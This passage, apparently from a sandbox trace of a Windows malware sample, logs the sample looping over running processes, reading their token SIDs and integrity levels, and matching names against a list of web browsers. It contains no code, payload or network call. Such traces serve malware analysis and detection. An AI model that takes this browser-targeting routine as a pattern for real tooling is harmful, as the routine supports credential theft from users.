lpString2="explorer.exe") returned 1 [0606.760] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0606.760] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0606.760] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0606.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0606.760] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0606.760] GetLastError () returned 0x7a [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0606.760] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0606.760] CloseHandle (hObject=0x668) returned 1 [0606.760] CloseHandle (hObject=0x298) returned 1 [0606.760] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0606.760] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0606.761] GetLastError () returned 0x7a [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0606.761] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0606.761] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0606.761] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0606.761] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0606.761] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0606.761] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0606.761] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0606.761] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0606.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0606.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0606.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0606.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0606.761] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0606.761] GetLastError () returned 0x7a [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0606.761] CloseHandle (hObject=0x668) returned 1 [0606.761] CloseHandle (hObject=0x298) returned 1 [0606.761] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0606.761] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0606.761] GetLastError () returned 0x7a [0606.761] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0606.761] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0606.761] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0606.761] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0606.761] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0606.761] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0606.761] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0606.761] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0606.761] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0606.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0606.761] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0606.762] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0608.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9690) returned 0xc0000004 [0608.766] VirtualAlloc (lpAddress=0x0, dwSize=0xa690, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0608.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa690, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0608.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0608.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0608.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0608.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0608.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0608.770] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0608.771] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0608.771] GetLastError () returned 0x7a [0608.771] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0608.771] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0608.771] CloseHandle (hObject=0x668) returned 1 [0608.771] CloseHandle (hObject=0x298) returned 1 [0608.771] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0608.771] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0608.772] GetLastError () returned 0x7a [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0608.772] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0608.772] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0608.772] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0608.772] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0608.772] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0608.772] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0608.772] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0608.772] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0608.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0608.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0608.772] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0608.772] GetLastError () returned 0x7a [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0608.772] CloseHandle (hObject=0x668) returned 1 [0608.772] CloseHandle (hObject=0x298) returned 1 [0608.772] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0608.772] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0608.772] GetLastError () returned 0x7a [0608.772] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0608.772] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0608.772] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0608.772] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0608.772] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0608.772] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0608.772] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0608.773] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0608.773] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0608.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0608.773] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0608.773] GetLastError () returned 0x7a [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0608.773] CloseHandle (hObject=0x668) returned 1 [0608.773] CloseHandle (hObject=0x298) returned 1 [0608.773] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0608.773] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0608.773] GetLastError () returned 0x7a [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0608.773] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0608.773] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0608.773] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0608.773] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0608.773] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0608.773] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0608.773] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0608.773] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0608.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0608.773] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0608.773] GetLastError () returned 0x7a [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0608.773] CloseHandle (hObject=0x668) returned 1 [0608.773] CloseHandle (hObject=0x298) returned 1 [0608.773] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0608.773] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0608.773] GetLastError () returned 0x7a [0608.773] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0608.773] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0608.773] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0608.774] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0608.774] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0608.774] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0608.774] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0608.774] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0608.774] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0608.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0608.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0608.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0608.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0608.774] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x668) returned 1 [0608.774] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0608.774] GetLastError () returned 0x7a [0608.774] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x1, TokenInformation=0x40fda8, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fda8, ReturnLength=0x20f7ac) returned 1 [0608.774] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0608.774] CloseHandle (hObject=0x668) returned 1 [0608.774] CloseHandle (hObject=0x298) returned 1 [0608.774] GetLengthSid (pSid=0x40fdb0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0608.774] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x668) returned 1 [0608.774] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0608.774] GetLastError () returned 0x7a [0608.774] GetTokenInformation (in: TokenHandle=0x668, TokenInformationClass=0x19, TokenInformation=0x41b388, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b388, ReturnLength=0x20f7d8) returned 1 [0608.774] GetSidSubAuthorityCount (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b391 [0608.774] GetSidSubAuthority (pSid=0x41b390*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b398 [0608.774] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0608.774] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0608.774] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0608.774] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0608.774] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0608.774] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0608.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0608.774] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0608.775] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0610.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9488) returned 0xc0000004 [0610.779] VirtualAlloc (lpAddress=0x0, dwSize=0xa488, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0610.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xa488, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0610.781] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0610.782] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0610.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0610.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) 